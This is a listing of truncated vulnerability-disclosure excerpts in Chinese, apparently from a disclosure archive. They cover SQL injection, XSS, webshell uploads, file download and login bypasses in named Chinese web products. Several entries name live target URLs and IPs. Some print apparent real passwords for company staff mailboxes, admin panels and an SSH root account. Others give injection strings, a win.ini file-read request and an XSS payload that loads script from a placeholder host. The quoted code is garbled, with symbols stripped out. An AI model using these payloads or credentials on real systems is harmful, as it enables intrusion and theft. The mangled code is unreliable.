Google Chrome < 44.0.2403.157 Bypass Anti-XSS filter Vulnerability

影响版本：Google Chrome〈 44.0.2403.157 已知Google Chrome具有XSS防护机制，防止执行XSS中的的JS代码。下面有一段PHP代码：?php // Echo the value of parameter one echo "This is text1:".$GET'text1'."brbr"; // Echo the value of parameter two echo "This is text2:".$GET'text2'."brbr"; ?...

cmseasy 无限制报错注入（php函数的坑）

简要描述： cmseasy 无限制报错注入（可获取全站信息exp） 详细说明： 问题还是出在clive 上面，但是跟以往的不同的是，xjxquery 这个上面就发生了问题，看代码： xajax.class.php: if $rootTag == "xjxquery" $sQuery = ""; $this-iPos++; while !stristr$this-aObjArray$this-iPos, "" if stristr$this-aObjArray$this-iPos, "" || stristr$this-aObjArray$this-iPos, "" $this-iPos+...

用友CRM系统任意文件上传getshell（附众多案例）

简要描述： 用友CRM系统任意文件上传getshell（附众多案例），使用量非常大 详细说明： 用友CRM系统，使用量非常广，该系统存在任意文件上传,导致无限制getshell 存在漏洞的文件为 None...

PHPYUN最新版Webscan绕过注入四处(可修改任意字段值)

简要描述： PHPYUN最新版Webscan绕过注入四处可修改任意字段值 详细说明： 漏洞参考： WooYun: PHPYUN最新版Webscan绕过注入四处可遍历全站信息，无需登录 看看 站点是怎么修补的： function FormatValues$Values $ValuesStr=''; foreach$Values as $k=$v ifpregmatch"/^a-zA-Z0-9+$/",$k ifpregmatch'/^0-9+$/', $k $ValuesStr.=','.$v; else $ValuesStr.=','.$k.'=''.$v.'''; return...

cmstop媒体云sql注入漏洞(1)-order by 注入技巧

简要描述： 今天无聊就多看了一会儿媒体云的产品，order by 后面的注入技巧 详细说明： 其他说明见： WooYun: cmstop媒体云SQL注入漏洞 同样的cmstop 媒体云的注入 注册账号后，在选择链接分类的时候，会发生如下链接 http://site.cmstop.cn/link/index/list?type=1&offset=0&limit=50&=1440172313381&sort=desc&category=2 但是其中的sort参数过滤不严格，导致了一个order by后面的mysql注入...

ShopEx多名员工安全意识不足泄露内部业务信息

简要描述： ShopEx 详细说明： 以下多名员工邮箱存在弱口令，包括hr。 hr Shopex123 chenminrui Shopex123 huhao Shopex123 lihuatian Shopex123 lixunlong Shopex1234 可进一步登陆 mail.shopex.cn 漏洞证明： 随机抽两个看一下 还有vpn说明 点到为止 就这样吧...

cmstop媒体云SQL注入漏洞

简要描述： 媒体云真是方便，直接注册就建立一个网站了，但是如果云出了漏洞呢？ 详细说明： CmsTop 媒体云 作为媒体云时代的开创者，思拓合众颠覆了传统的软件采购和项目外包模式，与传媒集团建立战略合作伙伴关系，以互联网思维和云计算技术为基础整合集团、区域和行业内的媒体及政务新媒体资源，共同建设和运营媒体云。 想象是美好的，现实呢，现实是，媒体云后台管理存在sql注入漏洞 我们随便注册一个账号（http://www.cmstop.cn/），然后访问用户功能 http://site.cmstop.cn//member/index/index?state=enable...

用友某系统目录遍历涉及大量敏感信息+未授权访问后台

简要描述： 用友某系统目录遍历涉及大量敏感信息+未授权访问后台 详细说明： 招投标系统 http://buy.ufida.com.cn/File/ http://buy.ufida.com.cn/images/ 大量个人简历和标书,合同等等. 漏洞证明： http://buy.ufida.com.cn/Web/ http://buy.ufida.com.cn/Web/BDMS/SystemStatistics.aspx img...

安宁创新网络科技ssh弱口令威胁内网

简要描述： ... 详细说明： www.anymacro.com auth.anymacro.com的2143端口和2150都是ssh 用户root密码admin 可代理进内网 漏洞证明：...

某网店系统一处越权任意用户登录

简要描述： 1 详细说明： WooYun: 某网店系统存在越权漏洞任意用户信息修改 同系统 http://demo.lebi.cn/admin/login.aspx 这是后台 后台的会员有个管理 管理的时候抓包看看get请求。。。 传输的请求是这样的：http://demo.lebi.cn/admin/user/login.aspx?id=1104 我们直接访问下看看 有人说洞主你发假洞吧？你登陆这test这个权限较高的用户，肯定能管理啦。呵呵了 我退出再试试吧- - https://images.seebug.org/upload/2...

KingCms最新版绕过补丁（版本：9.00.0018）注入一枚

简要描述： KingCms最新版绕过补丁（版本：9.00.0018）注入一枚 详细说明： 写在前面：漏洞存在于用户发送站内信的地方，因此，测试时需要注册一个前台的普通用户。 朋友的公司购买了kingcms的授权，最近kingcms官方给我朋友发来了升级包，升级说明当中说已经解决了已知的安全问题，今天再帮朋友测试下。 自从朋友购买，已经经过了9.00.0015，9.00.0016，9.00.0017，现在更新到了9.00.0018，kingcms服务还不错。9.00.0018的更新时间是2015.07.23，见官网http://www.kingcms.com/download/k9/...

用友某管理系统SQL注入

简要描述： 求个邀请码 来学习 详细说明： http://radm.chanjet.com http://125.35.5.144:81/fixsys/Default.aspx admin' or '1'='1 漏洞证明： admin' or '1'='1...

方维众筹系统SQL注入漏洞一

简要描述： 方维众筹系统SQL注入漏洞一 详细说明： 1.首先定位到漏洞文件。app\Lib\modules\accountModule.class.php。 public function getleaderlist if!$GLOBALS'userinfo' appredirecturl"userlogin"; $dealid=$REQUEST'id';//这里的id没有经过过滤 $deal=$GLOBALS'db'-getRow"select from ".DBPREFIX."deal where...

帝友P2P借贷系统SQL注入五处(无需登录)

简要描述： 帝友P2P借贷系统SQL注入五处无需登录 详细说明： 帝友p2p借贷系统v4.1 http://115.47.56.82:80/ 一:username POST /blacklist/index.html HTTP/1.1 Content-Length: 14 Content-Type: application/x-www-form-urlencoded Referer: http://115.47.56.82:80/ Cookie: PHPSESSID=52h7b50hs3nid900r34hcj09k5; DNbC2132saltkey=y44yYWII;...

某图书馆检索系统通用SQL注射

简要描述： RT 详细说明： Google:inurl:/opac/index.jsp 在以及单位这里抓包 GET /lt/dzgl/dzxxgl/getejdw.jsp?yjdw=00000030 HTTP/1.1 Accept: / Accept-Language: zh-CN User-Agent: Mozilla/4.0 compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR...

coremail某处持久xss指哪打哪

简要描述： 邮件发信人处未过滤特殊字符 详细说明： ;123"' /span\u003c\[email protected] [email protected] 是真正发信邮箱，前面的代码已经经过编码过了。虽然开发将标签过滤了，但是还是有办法让“ 清华大学邮箱：...

通用图书馆集成系统GLIS9.0高危注入

简要描述： RT 详细说明： 厂商：北京清大新洋科技有限公司 官网：http://.../ 用户：http://.../yonghu.html 这系统卖的挺贵的啊，看产品报价：http://.../cp/glis90.html 产品名称：通用图书馆集成系统GLIS9.0 市场价格：198000元FOR WIN、228000元FOR UNIX 代理价格：138600元FOR WIN、159600元FOR UNIX 其它：以上报价为基本版，每增加一个用户加5000元。 每次提洞在wooyun先看前辈的洞，然后接着挖 http://.../bugs/wooyun-2010-099335...

三星 SCX-8240 型打印机未授权访问

直接访问打印机 ip 可以进入打印机控制台, 如图所示 可以在文档箱位置查看之前打印过的内容 各种资料和保密协议都齐了...

金蝶协作办公系统存在六个SQL注射漏洞

简要描述： 金蝶协作办公系统存在六个SQL注射漏洞，影响很多大型企业 详细说明： 存在漏洞的文件为 /kingdee/flowperformance/addsearchcase.jsp?name=1 name存在漏洞 /kingdee/flowperformance/addviewcase.jsp?name=1 name存在漏洞 /kingdee/flowperformance/delsearchcase.jsp?id=1 id存在漏洞 /kingdee/flowperformance/delviewcase.jsp?id=1 id存在漏洞...

PHP云人才系统存储型XSS

简要描述： xss绕过技巧 详细说明： 首先一眼感觉这里可以插，因为提问和回答是交互功能 然而 过滤的挺死 括号被转义为全角 常见事件被过滤 部分标点被过滤 这样即可绕过，自定义图片，可以是超级大图，在图片上滚动鼠标滚轮触发XSS 测试360谷歌火狐等浏览器有效，IE11测试没触发 漏洞证明： 我爱乌云么么哒...

用友某管理系统后台弱口令

简要描述： 用友某管理系统后台弱口令 详细说明： http://nczx.ufida.com.cn admin asq66a3s 漏洞证明：...

方维o2o系统完整版的CSRF蠕虫(通过传播蠕虫来刷粉丝)#4

简要描述： 方维o2o系统完整的CSRF蠕虫利用传播蠕虫刷粉丝，附上我的思路4，4个通用啦。方维厂商良心厂商啊，礼物不要了请我去吃个方便面就行了！ 详细说明： 漏洞证明： None...

fineCMS免费版xss getshell

简要描述： xss 详细说明： 注册一个用户，在发表文章的地方发表文章 在编辑器里加入一张图片 用firebug修改图片地址 加入onerror属性 onerror=document.body.appendChilddocument.createElement'script'.src='//xxx.xxx/a.js' 因为发表的文章需要后台管理员审核的， 当管理员审核的时候触发漏洞 然后是getshell 有了后台xss都好办 在修改版权处 保存以后 漏洞证明：...

帝友P2P借货系统全局问题造成多处注入之2(无视360防御/gpc/受长度限制)

简要描述： 帝友P2P借货系统全局问题造成多处注入之2无视360防御/gpc/受长度限制附加整套系统数据库分析 从注入一步步到后台拿shell，分析数据库，注入出后台地址和管理员密码明文 详细说明： --------------------------- 注入篇 首先看看全局文件出现的问题 core\upload.class.php function upfile$data = array global $mysql; $error = ""; if !isset$data'file' return ""; $filename =...

用友某管理系统后台弱口令已GetShell

简要描述： 用友某管理系统弱口令已GetShell 详细说明： http://vip.ufida.com.cn/nccsm/Admin.aspx admin sqbbagdp 进入后台发现有个编辑器 然后getshell 里面的数据太多了 漏洞证明： admin sqbbagdp 进入后台发现有个编辑器 然后getshell 里面的数据太多了...

一采通电子采购系统任意文件上传Getshell #2

简要描述： 一采通电子采购系统任意文件上传Getshell 2 详细说明： 上传点 /Supplier/UploadFile.aspx 以吉利采购平台为例 http://.../Supplier/UploadFile.aspx 上传时抓包，修改两处 1.filename前面加\ 2.hidTrueName的值 shell：http://.../d.asp 漏洞证明： 其他例子还有 http://.../Supplier/UploadFile.aspx http://.../Supplier/UploadFile.aspx .../Supplier/UploadFile.aspx...

帝友P2P借货系统全局问题造成多处注入（无视360防御/gpc/受长度限制)

简要描述： 帝友P2P借货系统全局问题多处注入,无视360防御,gpc附加整套系统数据库分析 从注入一步步到后台拿shell，分析数据库，注入出后台地址和管理员密码明文 详细说明： --------------------------- 注入篇 首先看看全局文件出现的问题 core\function.inc.php中 function ipaddress if!empty$SERVER"HTTPCLIENTIP" $ipaddress = $SERVER"HTTPCLIENTIP"; else if!empty$SERVER"HTTPXFORWARDEDFOR" $ipaddress =...

Discuz 前台回帖 存储型 DOM XSS

产生原因： JS原生取ELEMENT中HTML内容的方法，会将服务端转义过的单双引号实体编码进行反转。 代码分析： 这里有payload: align="onmouseover="alert1, 那么就从payload开始往回看漏洞是怎么产生的 align="onmouseover="alert1 回帖之后payload显示如上述所示, 跟进 管理员/版主 编辑帖子时的操作 var editorid = 'e'; var textobj = $editorid + 'textarea'; 这里得到textobj = 'etextarea' /static/js/common.js...

浪潮某政府系统通用SQL注入24处打包

简要描述： ... 详细说明： 某政府系统通用SQL注入24处打包。 案例：（23处GET注入+1处POST注入） 23处GET注入： http://www.whaac.gov.cn:8080/BusinessRegistration/BRProjectList.aspx?page=1&procode= http://www.cfdonline.org.cn/OutPortalCFD//BusinessRegistration/BRProjectList.aspx?page=1&procode=...

thinksaas最新版存储xss

简要描述： 过滤不当 详细说明： 最新版下载地址http://www.thinksaas.cn/service/down/ 跟前面thinksaas最新版xss2 WooYun: thinksaas最新版xss2 thinksaas最新版xss WooYun: thinksaas最新版xss 原理都一样 吐槽下 官网不让注册帐号 就在本地测试了 前人的我测试一个现在还可以 当然 漏洞文件肯定是不一样的 漏洞文件 在app/article/action/add.php 25行中没有过滤 48行插入数据库 isLogin; switch $ts case "" : if...

Discuz! x2,x2.5,x3.0,x3.1,x3.2 XSS直打管理员

简要描述： 某处xss，打进管理员后台去了 详细说明： 那个插件是不是官方审核过的？还是开发者提交了就可以的呢？ 你们看着办吧。 Discuz!论坛有很大一部分的用户用了友情链接自助申请。问题就在这里。 提交都是没有过滤的 漏洞证明： 提交界面都这幅模样 添加xss代码。 提交，坐等管理员审核。 （自己模拟管理员点了一下）cookie就来了，一下子来三段……cookie，浏览器保存的明文密码。 虽然我模拟的是有点小特殊的环境，但是不代表所有的管理员都不会不在浏览器上保存明文密码。这明文密码要是获取了……就可以进行拿shell了，分分钟的事了...

tipask注入漏洞（条件限制）

简要描述： tipask注入漏洞 详细说明： 漏洞细节： tipask url格式类似如此 index.php?classname/methodname 然后再初始化的index.php 会实例化名为classname 的类， run 后面的方法在method 名前面加上字符串on 这个是个$FILES 注入吧。漏洞比较奇葩。 tipask 有全局的过率机制，虽然过率了post get 等数据可是忽略了$FIELS ，但是这个地方 function onuploadimage //上传配置 $config = array "uploadPath" = "data/attach/",...

汇文Libsys图书管理系统sql注入

简要描述： 嗯，就是一个注入而已 详细说明： 注入地址： shelf/curriculum.php 参数： type 测试： 1.1.http://202.201.163.2:8080/shelf/curriculum.php?type=name&q=%E8%88%9E%E8%B9%88%E5%AD%A6&submit=%E6%A3%80%E7%B4%A2...

Discuz!后台秒getshell（第三方安全问题）

简要描述： Discuz!后台再严，经不住第三方放水,不禁在想discuz插件那么多，漏洞补得完吗 详细说明： 最近github各种Discuz后台弱口令，于是自己下载了一个discuzx3.2应该是最新版了，后台各种找啊，没找到bug，就在要放弃的时候，一个插件，起死回生。 漏洞证明： 1.后台找到应用，插件 2.有一个好贷站长联盟 3.安装之后有一个导入接口信息 4.然后导入接口信息 5.接口信息会放到这里 6.然后就shell了 img src="https:/...

BIND9 TKEY assert Dos

我们对 9.9.7-P1 和 9.9.7-P2 这两个版本进行了 diff,发现其主要 Patch 点位于 lib/dns/tkey.c文件中第 653 行 dnstkeyprocessquery 函数中: 在该函数中两次调用 dnsmessagefindname 函数来分别从 DNSSECTIONADDITIONAL 和 DNSSECTIONANSWER 中寻找 TEKY 记录,从代码中可以看到,第一次函数调用之前 na me 变量进行了初始化,被赋值为 NULL,而第二次调用前却未进行初始化。 dnsmessagefindname 函数原型位于 lib/dns/message.c...

金蝶安全漏洞小计

简要描述： 详细说明： 部分子页面权限控制不严可以越权访问，部分公司信息泄露，外加sql注入一枚 漏洞证明： 1，公司组织架构与人员信息 地址：http://emeeting.mykingdee.com/tree/RadioCheck.htm http://emeeting.mykingdee.com/tree/tree.htm 2，sql注入一枚与信息泄露 地址：http://emeeting.mykingdee.com/usercontrol/right/booking/qiandao.aspx?hybh=hy149215 3，越权访问...

Cisco IOS XE <=3.13S 版本拒绝服务攻击

Cisco IOS是多数思科系统路由器和网络交换机上使用的互联网络操作系统。 Cisco IOS XE 3.13S及更早版本，在数据包重组的实现上存在安全漏洞，远程攻击者在重组失败后通过碎片IPv4或IPv6数据包触发ATTN-3-SYNCTIMEOUT错误，可造成拒绝服务CPU资源耗尽或数据包丢失。...

PHPMyWind任意用户密码重置

简要描述： PHPMyWind任意用户密码重置 详细说明： 首先我们注册两个用户 第一个叫jkgh006 第二个叫test123 那么我们下来分析一下代码: member.php: else if$a == 'saveedit' //检测数据完整性 if$password!=$repassword or $email=='' header'location:?c=edit'; exit; //HTML转义变量 $answer = htmlspecialchars$answer; $cnname = htmlspecialchars$cnname; $enname =...

discuz某插件设计缺陷可前台getshell（有较强条件限制）

简要描述： 设计缺陷 详细说明： discuz积分商城插件任意文件包含（最新版测试） 插件信息： http://addon.discuz.com/[email protected] 官方安装量3000+ （已经不少了吧） 关键字搜一下： 折腾了半天才搞定成功云平台服务。。终于可以装插件了。。。 测试环境： PHP 版本为: 5.2.9-2 magicquotesgpc = off 先看看代码吧： dcmall.inc.php漏洞文件 getdata; $sortid = dintval$GET'sortid'; ifempty$mallnav$sortid$sortid=0; @includ...

kppw最新版任意用户登录

简要描述： 只需要用户名和用户id即可实现任意用户登录 详细说明： 问题出在 lib/inc/kekecoreclass.php function inituser 第981行 elseif $COOKIE 'kekeautologin' $loginInfo = unserialize $COOKIE 'kekeautologin' ; $pwdInfo = explode '|', base64decode $loginInfo 2 ; $uInfo = kekezu::gettabledata '', 'witkeyspace', " username='$pwdInfo2' an...

53KF设计缺陷可冒充客服随意发消息（以平安万里通为例）

简要描述： 53KF软件，可以随意冒充客服发送消息给访客。 详细说明： 首先，查看网络请求，发现访客给客服发消息的时候，请求的内容如下： 这时候，高潮来了，我们把sid和did倒一下，然后用curl发个请求过去，这个时候，居然，对话窗口，客服，活了，客服说话了！！！！太假了！！！ 别问我怎么发现的。 好不容易找下万里通客服。 发过去的消息都不回复。 本想用curl疯狂发消息。 然后不小心将sid和did调换了一下。 然后还需要然后吗？ 漏洞证明： 不用证明了吧。...

金蝶协同办公平台任意文件下载漏洞（无需登录）

简要描述： 金蝶协同办公平台任意文件下载漏洞（无需登录） 详细说明： 经测试发现，该系统存在任意文件下载，且无需登录 存在漏洞的文件： /oa/admin/application/filedownload.jsp?filePath= 部分漏洞代码为： 很明显的任意文件下载漏洞，随便在网上找一个实例进行证明 http://oa.xpngs.com/oa/admin/application/filedownload.jsp?filePath=c:\windows\win.ini 直接访问即可下载该文件了，保存的文件...

discuz越权回复第二式(回复无权限帖子)

简要描述： 另类第二种 详细说明： www.hegouvip.com 他是dz 3.1 非会员是不能在会员专区回复的 看这里哇 分享这里 我们弄 尤其要点上同时回复 就会 成功 现在可以了 漏洞证明： img src="https://images.seebug.org/upload/201506/2910381641d85816d2d574699a34a9a8aefe3d43.png" alt="5.png" width="600" onerror="javas...

骑士CMS最新版任意用户登陆

简要描述： 骑士CMS最新版任意用户登陆（官网demo测试）。 详细说明： 骑士CMS最新版去掉了全局addslash include/common.inc.php @@ -17,20 +17,10 @@ sessionsavepathQISHIROOTPATH.'data/sessions/'; sessionstart;\r requireonceQISHIROOTPATH.'data/config.php';\r header"Content-Type:text/html;charset=".QISHICHARSET;\r...

金碟UE学堂phpmyadmin越权访问

简要描述： 详细说明： http://kdued.kingdee.com/phpmyadmin/index.php 可以直接访问 造成大量用户账号信息的泄漏 漏洞证明：...

可绕过最新版云锁1.4.181的webshell检测

简要描述： 可绕过最新版云锁1.4.181的webshell检测 详细说明： 这次是把一句话压缩在图片中，然后菜刀链接，上次提交的一句话木马的检测不知道为什么一直没有审核，没有办法，只好再发一个了。 环境 windows2003服务器 mysql5.5.3+php 客户端云锁1.4.181 服务器端云锁1.4.181 一句话图片马 密码hello 漏洞证明： 可以看到并没有检测到同目录下的1.jpg一句话图片木马，...

上海泛微网络科技股份有限公司办公系统信息泄露

简要描述： 上海泛微网络科技股份有限公司自身的办公系统信息泄露 详细说明： 泛微也是使用自己开发的OA系统，目前版本是8.0，存在一处敏感文件未授权访问导致的员工组织架构泄漏风险。可被用来进行暴力破解等攻击。 测试时进行了简单的弱密码枚举，发现60多个员工的密码是123456 域名：www.e-cology.com.cn 存在问题的url: http://www.e-cology.com.cn/messager/users.data 该文件包含了所有员工的loginid、姓名、邮箱、手机号、职位等信息。loginid即是登录oa的用户名。 该问题进行了base64编码，内容如下： 解码后...

麦达特色库检索平台多处SQL注入#2

简要描述： 前几天提交了一次，说我跟http://wooyun.org/bugs/wooyun-2015-0120725 重复了， 这个也是我之前提交的，有一段时间了...除了都是SQL注入外，好像没什么共同点了吧, 不仅不是同一处，也不是同一类型的注入。 不知道是审核大哥没注意，还是乌云改规则了，同一SQL注入都算一个问题... 另外也不是刻意刷洞分开提交的，也是前几天看了下之前自己提交过的漏洞新发现的，不知道怎么没通过,之前这种都不算重复吧... 刚好今天又发现了一处问题，一起再提交一次。 详细说明： 刻意参见我之前提交的漏洞...

某在线培训系统SQL盲注漏洞

简要描述： rt 详细说明： 官网站：http://.../Login.aspx 在注册用户，检测用户名是否存在 处存在POST注入！ 附：...:8000/ 一例 数据包如下： POST /CscAjax/ajax.aspx HTTP/1.1 Host: ... Proxy-Connection: keep-alive Content-Length: 63 Accept: text/html, / Origin: http://... X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 Windows NT 6.1; WOW...

大米CMS存在0元购物逻辑漏洞（demo演示）

简要描述： 大米CMS存在0元购物逻辑漏洞,当然要注册会员咯。但是可以0元购物 详细说明： 漏洞文件:Web/Lib/Action/MemberAction.class.php //413行 if!isnumeric$POST'id'$i || !isnumeric$POST'price'$i || !isnumeric$POST'qty'$icontinue; $data'gid' = $POST'id'$i; //这里把传入的商品id传给了 $data'gid' $data'uid' = $SESSION'damiuid'; $data'price' =...